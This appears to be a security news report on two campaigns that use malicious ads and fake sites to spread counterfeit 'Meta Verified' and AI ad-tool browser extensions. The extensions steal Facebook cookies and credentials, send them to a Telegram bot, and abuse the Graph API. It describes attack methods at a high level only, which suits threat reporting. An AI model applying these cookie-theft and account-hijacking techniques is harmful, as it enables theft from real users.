Cybersecurity researchers have uncovered two coordinated campaigns distributing fake browser extensions through malicious ads and counterfeit websites, aimed at stealing sensitive user data from Facebook and Meta advertisers. The campaigns employ extensions that masquerade as legitimate tools, including fake “Meta Verified” add-ons and AI-powered ad optimization utilities.
“The malicious ads are bundled with a video tutorial that guides viewers through the process of downloading and installing a so-called browser extension, which claims to unlock the blue verification tick on Facebook or other special features,” Bitdefender explained. In reality, the SocialMetrics Pro extension, hosted on the cloud service Box, collects Facebook session cookies and sends them to a Telegram bot controlled by attackers. It can also retrieve the victim’s IP address through ipinfo[.]io/json. Select variants of the extension have been observed using stolen cookies to interact with the Facebook Graph API, likely to gather additional account information for resale or further malicious campaigns.
Bitdefender noted that the campaigns exhibit characteristics linked to Vietnamese-speaking threat actors, including Vietnamese-language tutorials and source code comments. “By using a trusted platform, attackers can mass-generate links, automatically embed them into tutorials, and continuously refresh their campaigns,” the company said. “This fits a larger pattern of attackers industrializing malvertising, where everything from ad images to tutorials is created en masse.”
A separate campaign targets Meta advertisers using fake Chrome extensions distributed via counterfeit websites promoting AI-powered ad optimization tools, including Madgicx Plus, Meta Ads SuperTool, and Madgicx X Ads. “Promoted as a tool to streamline campaign management and boost ROI using artificial intelligence, the extension instead delivers potentially malicious functionalities capable of hijacking business sessions, stealing credentials, and compromising Meta Business accounts,” Cybereason reported.
Once installed, these extensions gain full access to all websites visited by the user, allowing attackers to inject scripts, intercept traffic, monitor activity, and harvest credentials. They also prompt users to link their Facebook and Google accounts, while covertly capturing identity information. Similar to the Meta Verified extensions, the add-ons use stolen Facebook credentials to interact with the Facebook Graph API. “This staged approach reveals a clear threat-actor strategy: first capturing Google identity data, then pivoting to Facebook to broaden access and increase the chances of hijacking valuable business or advertising assets,” Cybereason said.
These campaigns highlight the increasing sophistication of malvertising and browser extension-based attacks targeting social media and advertising platforms, emphasizing the need for users and organizations to remain vigilant when installing extensions and engaging with online ads.
